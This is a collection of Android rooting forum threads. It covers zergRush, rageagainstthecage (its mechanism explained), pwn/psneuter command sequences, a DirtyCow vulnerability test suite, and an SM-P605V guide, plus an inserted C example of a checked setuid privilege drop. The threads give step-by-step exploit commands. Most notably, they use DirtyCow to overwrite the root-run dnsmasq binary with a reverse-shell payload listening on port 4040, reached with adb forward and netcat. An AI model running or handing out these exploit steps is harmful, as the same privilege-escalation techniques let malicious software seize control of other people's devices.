Attempt to get root on Android 5 with locked bootloader - Galaxy Note 4 Q&A, Help & Troubleshooting

Hello everyone. I'm the owner of the Verizon version of the Note 4, the N910V. Unfortunately, I found out that it has a locked bootloader after I bought it. It's even impossible to get root on Android 5.
I don't want to accept that, and I'm going to try to get at least temporary root on this smartphone.
Why it is possible:
- it's a matter of vulnerabilities. KingRoot is able to root the latest Android 4.4, even with a locked bootloader
- Android 5 was released more than 2 years ago; there has been enough time for the vulnerabilities present in our ROMs to be disclosed
- the Linux kernel we use is pretty old too: Linux 3.10.40 was released in May 2014
- VTS for Android shows several existing vulnerabilities that give system-level privileges
Plan:
- Get system-level privileges
- Get root level privileges
- Get permanent root (bypass write protection)
Progress:
- How to run busybox through adb shell:
Download the busybox executable from https://busybox.net/downloads/binaries/latest/
Copy it to the phone: adb push busybox-armv7l /data/local/tmp/
Run adb shell and execute these commands
Code:
cd /data/local/tmp/
chmod 755 busybox-armv7l
mkdir busybox
cd busybox   # the applet symlinks must be created inside this directory, so that ../busybox-armv7l resolves
for app in $(../busybox-armv7l --list); do ln -s ../busybox-armv7l $app; done
export PATH=$PATH:/data/local/tmp/busybox
Enjoy
Repeat the last command (the export) in every adb shell session
Current:
I'm going to use the CVE-2015-1528 vulnerability to try to get system-level privileges.
I'm opening this thread to share my progress and to get any advice/help with this.

Sounds interesting. Keep us informed!
Sent from my SM-N910F using Tapatalk

Quick update. I switched to the CVE-2015-3825 vulnerability. It should work on any Android up to 5.1; it seems easier because you only need to exploit one service, and there is good documentation: https://www.usenix.org/system/files/conference/woot15/woot15-paper-peles.pdf.
Although I understand how to use this vulnerability, unfortunately I'm not an Android developer or a low-level hacker, so it may take some time for me to implement it all.
I've already started work on this exploit. Any help is appreciated.

Has somebody successfully got temporary root on a retail edition Android 5 Note 4 with KingRoot 4.8.1? One guy from a sibling thread said that he did it successfully on Android 5.1.1.

Related

[Q] Should my zergRush rooting remain after reboot ?

Hi
I have rooted my Fire with zergRush and confirmed with adb shell
Code:
# id
uid=0 gid=0
but after rebooting the Fire it seems to have gone, as the prompt returned to $
Is this usual?
I'm on a Mac and the Fire is on 6.2. I can root again, but obviously it would be good if it remained after a reboot.
Any help would be much appreciated
edit: but now I'm not so sure... su from adb shell returns 'not found', and when running a terminal app I have on the Fire the prompt is $ and su returns 'permission denied'.
I'm not really the one who should answer this, as I'm not really up on the different exploits used for rooting, but...
My understanding was that zergRush got you a temporary root, which was enough to enable you to remount /system as RW, which then lets you install su and busybox and the Superuser.apk, which then gives you permanent root.
Sent from my Kindle Fire using Tapatalk
Like bsoplinger said,
zergRush is the exploit most are using to gain root, and then, while you have root, it allows you to install tools which survive the reboot cycle and continue to provide root from that point on.
Busybox, su and Superuser are those tools.
Thanks very much, that certainly gives me more to go on, although I'm a bit confused as to when I should be installing tools using adb and when I should be using a file manager. Probably neither, and I have the wrong end of the stick. No probs.
edit: I think I've got it... can't thank you enough, your advice has saved me hours I'm sure, but I will wait till the morning. I'd rather brick it with a fresh head than the one on my shoulders now.

[Q] How can I get ADB root? I want to know rageagainstthecage's working principle

Hi, guys!
As the title says, I found a tool named "rageagainstthecage", but I want to know how it works. Can anyone help me? Thanks
try superoneclick
Are you using Linux to grant root access on your Defy?
I rooted mine yesterday and I was a little confused about how to do it; I have the same file as you, as I read. rageagainstthecage is the exploit that will grant you root privileges. The instructions for Linux are here [1]. I replaced 'exploit.bin' with 'rageagainstthecage', or you can use the one provided in that post, 'psneuter'. The process is simple:
1. Copy the files to the phone using adb (I used /data/local/tmp as the directory on the phone): su, busybox, Superuser.apk and the exploit (exploit name, let's say: rageagainstthecage)
2. Make the exploit executable and execute it
3. Give permissions to the su and busybox commands
4. There you go
All the credit goes to the author of the post on the IBM forum
I hope this helps you with your question
[1]
PHP:
www_ibm_com/developerworks/mydeveloperworks/blogs/coolwinding/entry/how_to_root_defy_on_linux1
jianbangguo said:
try superoneclick
Does superoneclick use "rageagainstthecage" to grant adb root access? I just want to know about "rageagainstthecage": how does it work? Can you help me? Thanks
cristianpark said:
Are you using Linux to grant root access on your Defy?
I rooted mine yesterday and I was a little confused about how to do it; I have the same file as you, as I read. rageagainstthecage is the exploit that will grant you root privileges. The instructions for Linux are here [1]. I replaced 'exploit.bin' with 'rageagainstthecage', or you can use the one provided in that post, 'psneuter'. The process is simple:
1. Copy the files to the phone using adb (I used /data/local/tmp as the directory on the phone): su, busybox, Superuser.apk and the exploit (exploit name, let's say: rageagainstthecage)
2. Make the exploit executable and execute it
3. Give permissions to the su and busybox commands
4. There you go
All the credit goes to the author of the post on the IBM forum
I hope this helps you with your question
[1]
PHP:
www_ibm_com/developerworks/mydeveloperworks/blogs/coolwinding/entry/how_to_root_defy_on_linux1
Pardon my poor English. I just want to know how it works, for example rageagainstthecage's working principle, not how to use "rageagainstthecage" to grant root access. Thank you!!
The principle of how it works is very simple: the rageagainstthecage exploit just forks processes until the processor hits the max, then the system will kill the oldest apps. Because you are using adb and running psneuter, the system will kill the adb shell, and here is the magic: when you restart the adb shell it starts with root rights. To prevent that, immediately after adb starts, the system calls the setuid function, but because the process list is full, the exploit prevents the setuid call, allowing you to maintain the root rights. At that point, you push Superuser.apk to allow root access to the apps, having first changed the permissions of the su binary to allow you to call that binary as a user with fewer rights. That is the idea behind the exploit! Hope that helps you!
Sorry for the bad English
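The unchecked setuid() call described in the post above is the root cause of the adbd bug; the following is an added example (not code from the thread, nor from any Android release) of the privilege-drop pattern that closes it, written for Linux. It assumes AID_SHELL = 2000 (Android's shell uid) and that the program may run either as root or as an ordinary user.

```c
/*
 * Added example: a privilege drop that refuses to carry on as root when the
 * drop fails.  adbd of the rageagainstthecage era called setuid(AID_SHELL)
 * without checking the result.  On kernels before Linux 3.1, setuid() fails
 * with EAGAIN when the target uid is already at RLIMIT_NPROC, so after the
 * fork flood adbd simply continued as uid 0.  (Since 3.1 the RLIMIT_NPROC
 * check moved to execve(), but an unchecked drop is still a bug.)
 *
 * The vulnerable shape, for reference only:
 *
 *     setgid(AID_SHELL);
 *     setuid(AID_SHELL);        // result ignored: on EAGAIN still uid 0
 *     execve("/system/bin/sh", ...);
 *
 * Assumptions: AID_SHELL (2000) is Android's shell uid; the program is
 * compiled for Linux and may run as root or as an ordinary user.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define AID_SHELL 2000

/*
 * Drop to uid/gid and prove that it happened.  Returns 0 on success and -1
 * (errno set) if any step fails or the drop did not take effect.
 */
int drop_privileges_checked(uid_t uid, gid_t gid)
{
    uid_t euid_before = geteuid();

    /* gid first: once the uid is unprivileged, setgid() would be refused. */
    if (setgid(gid) != 0)
        return -1;                 /* EPERM or EAGAIN: still privileged */
    if (setuid(uid) != 0)
        return -1;                 /* this is the call adbd never checked */

    /* Verify real and effective ids; never trust the drop blindly. */
    if (getuid() != uid || geteuid() != uid || getgid() != gid) {
        errno = EPERM;
        return -1;
    }
    /* If we were root, regaining root must now be impossible (no saved uid). */
    if (euid_before == 0 && uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Stand-alone demo: drop to AID_SHELL when root, otherwise to our own ids. */
int main(void)
{
    uid_t target_uid = (geteuid() == 0) ? (uid_t)AID_SHELL : getuid();
    gid_t target_gid = (geteuid() == 0) ? (gid_t)AID_SHELL : getgid();

    if (drop_privileges_checked(target_uid, target_gid) != 0) {
        /* Refuse to continue: continuing here is exactly the adbd bug. */
        fprintf(stderr, "privilege drop failed: %s\n", strerror(errno));
        return EXIT_FAILURE;
    }
    printf("running as uid=%u euid=%u\n",
           (unsigned)getuid(), (unsigned)geteuid());
    return EXIT_SUCCESS;
}
```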
LeonardoJegigzem said:
The principle of how it works is very simple: the rageagainstthecage exploit just forks processes until the processor hits the max, then the system will kill the oldest apps. Because you are using adb and running psneuter, the system will kill the adb shell, and here is the magic: when you restart the adb shell it starts with root rights. To prevent that, immediately after adb starts, the system calls the setuid function, but because the process list is full, the exploit prevents the setuid call, allowing you to maintain the root rights. At that point, you push Superuser.apk to allow root access to the apps, having first changed the permissions of the su binary to allow you to call that binary as a user with fewer rights. That is the idea behind the exploit! Hope that helps you!
Sorry for the bad English
Great info, thanks for sharing this with us. I was wondering the same.

root on locked bootloader KITKAT ? ? :(

I'm curious if there is any way to push "su" to the system?
I mean, c'mon, there are plenty of KitKat 4.4.2 fastboot files.
I have tried pushing "su" manually with the "pwn" exploit.
Tried with the following exploits:
-psneuter
-pwn
but no luck there.
Anyone, pleaseeeee... I'm dying here..
Our system details:
- LOCKED BOOTLOADER
- KIT KAT 4.4.2
- Blur_Version.183.46.10.XT907.Verizon.en.US ( KDA20.62-10.1 )
What I tried is
Code:
adb devices
adb push pwn /data/local/tmp
adb shell
$ cd /data/local/tmp
$ chmod 777 pwn
$ ./pwn
( NO LUCK GETTING PERMISSION AFTER $ ./pwn )
At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.
adb kill-server
adb devices
Now comes the moment of truth. Use the
adb shell
command to open a shell. If you see a "#" sign, you have root access, so go ahead and continue to the next part.
If not, you can go back and try the previous steps again
We now need to make this root permanent. From the root shell you just opened, type the following commands.
# mount -o remount,rw -t rfs /dev/block/st19 /system
# exit
adb push busybox /system/bin
adb push su /system/bin
adb install Superuser.apk
adb shell
# chmod 4755 /system/bin/busybox
# chmod 4755 /system/bin/su
# mount -o remount,ro -t rfs /dev/block/st19 /system
# exit
adb reboot
Guys, let's make this happen anyhow... let's roll...
Even this won't work:
http://www.kingoapp.com/
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured out how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
GnatGoSplat said:
Every root method I've ever found for KK requires an unlocked bootloader, and I'm talking about looking outside the box at all different brands/models of phones too. I guess Google finally figured out how to lock things up as well as Apple. I've read XDA user "jcase" had discovered a KK exploit that works on some Motorolas, but he's keeping it secret for some mysterious reason and will be presenting it at a Black Hat conference. Why anyone would rather help companies than consumers is beyond my comprehension, but it is what it is.
Every exploit has two sides to it: it can be used more or less legitimately by users to obtain root privileges, but it can also be abused by rogue apps to gain control over someone else's device.
When you find an exploit, the sooner you publish it, the sooner it will be patched in a firmware update, making it unusable for gaining root privileges. And since you've published it, the bad guys can make use of it as well.
Companies patching existing vulnerabilities is natural and essentially done in favour of users' safety.
The specific timing of releasing details about a vulnerability can be part of a tactic - you can give users a window for gaining root just after a specific expected firmware release for some device. If an exploit is published too soon, it will be patched in an upcoming firmware update and no one will be able to use it for rooting...
That means there is a possible way, of course, but the thing is whether it could be found or not......
Of course for good reasons.......

[DirtyCow][Linux]Vulnerability Test Suite

Hi guys,
I made a small test suite to test for vulnerability to CVE-2016-5195 on Linux-based systems.
This is 99.9% the work of the author of the exploit; I just made some minor changes to turn it into a test suite.
Download: DirtyCow Test-Suite
Important: Activate USB debugging to get the adb shell running!
How to test:
Code:
Download the test suite from above server
Unpack the .zip
Attach your device via USB to your PC
./testvuln.sh
If vulnerable, you should see this:
Code:
202 KB/s (10000 bytes in 0.048s)
131 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
UID=0(root), your device is vulnerable!
Otherwise if not vulnerable something like this:
Code:
140 KB/s (10000 bytes in 0.069s)
133 KB/s (5904 bytes in 0.043s)
Running exploit, may take some time
run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]
Source (you can build it yourself via the NDK):
https://www.androidfilehost.com/?fid=457095661767106997
Hint: Should work on all ARMv8 devices!
As I understand it, this would give a root adb shell and therefore I could root my Z5 Compact and install SuperSU? I only want to remove some garbage apps without unlocking the bootloader.
tavoc said:
As I understand it, this would give a root adb shell and therefore I could root my Z5 Compact and install SuperSU? I only want to remove some garbage apps without unlocking the bootloader.
This elevates the privileges of a process. If you want a root shell you must make some modifications to the code, but this can potentially root all DirtyCow-affected devices.
Thanks, I will have a look at your code. Maybe a GitHub account would be nice for pull requests etc.
tavoc said:
Thanks, I will have a look at your code. Maybe a GitHub account would be nice for pull requests etc.
The best thing you can do is fork this; I made some changes which contradict your desire for a root tool.
So this script is not working under Windows, is that right?
So we can get a root shell? But I don't think we can change the system partition without changing the kernel, right?
Or can we?
My question is: can we root the device with this method?
DannyWilde said:
So this script is not working under Windows, is that right?
For Windows, download the adb tools, copy all the binaries to the adb folder and enter the following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
sijav said:
So we can get a root shell? But I don't think we can change the system partition without changing the kernel, right?
Or can we?
My question is: can we root the device with this method?
1. Yes
2. Yes
3. Yes, potentially
Tommy-Geenexus said:
For windows,download adb tools, copy all binary to adb folder and enter following in a terminal:
Code:
adb push dirtycow /data/local/tmp/dirtycow
adb push run-as /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
adb shell /system/bin/run-as
On
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
I get "not found".
On
adb shell /system/bin/run-as
I get "run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]"
The run-as process has only 2 capabilities (setuid/setgid); also, with the SELinux restriction, it cannot exec any shell even if it gets elevated privilege...
super_apache said:
The run-as process has only 2 capabilities (setuid/setgid); also, with the SELinux restriction, it cannot exec any shell even if it gets elevated privilege...
I know. This is not a root tool; this is just to test for the vulnerability.
Edit: Not sure if this was directed at me or the guy asking the root question; anyway, this answers the root question.
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU): you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU): you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
This is the wrong thread then. I definitely do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
ninestarkoko said:
Would be nice to have a working root exploit for Marshmallow. Keep us updated please.
To those asking about root (SuperSU): you must remember that with a locked bootloader you can't edit the kernel or system partition.
As said elsewhere, there's no way to "root" without unlocking the BL.
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
Tommy-Geenexus said:
This is the wrong thread then. I definitely do not have enough knowledge to get any kind of exploit working.
Best ping your favorite hacker and try to convince him to write an exploit.
Sorry, I misunderstood too. I thought you were planning to use it practically to create an exploit for MM.
I don't think it's necessary as we already have an exploit for LP, though it would be nice.
YuriRM said:
Have a look at this thread. They managed to root the BLU R1 HD v6
http://forum.xda-developers.com/r1-hd/how-to/blu-r1-hd-v6-6-dirtycowed-f-amazon-root-t3490882/
"WARNING UNLOCKING YOUR BOOTLOADER WILL WIPE DATA AND FACTORY RESET THE DEVICE"
They unlock the bootloader using a fastboot command
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
wessok said:
How's everything going here? After reading various threads and Googling for hours, this seems to be the best chance to be able to permanently root the Z5 Compact with a locked bootloader.
Really hope you're onto something and are well rested after Christmas
Googling for hours and you didn't understand a simple sentence (in my post above) or the technical reasons behind it (in many threads)? Stop your search now, unlock it and live happily.

[SM-P605V] Verizon Temporary Root & Bootloader Unlock Research

Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SELinux-limited and thus not of significant utility as it is. I've made some inroads regarding patching init toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID and aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root, but since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot, and if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel and launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SELinux context, but it's a start.
This does not apply if you're on 4.4.2; there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case, as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
	adb shell 'chmod 777 /data/local/tmp/dcow'
	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this; any SIM will do, even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this; any SIM will do, even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium for some time, I will look into a permanent root solution.
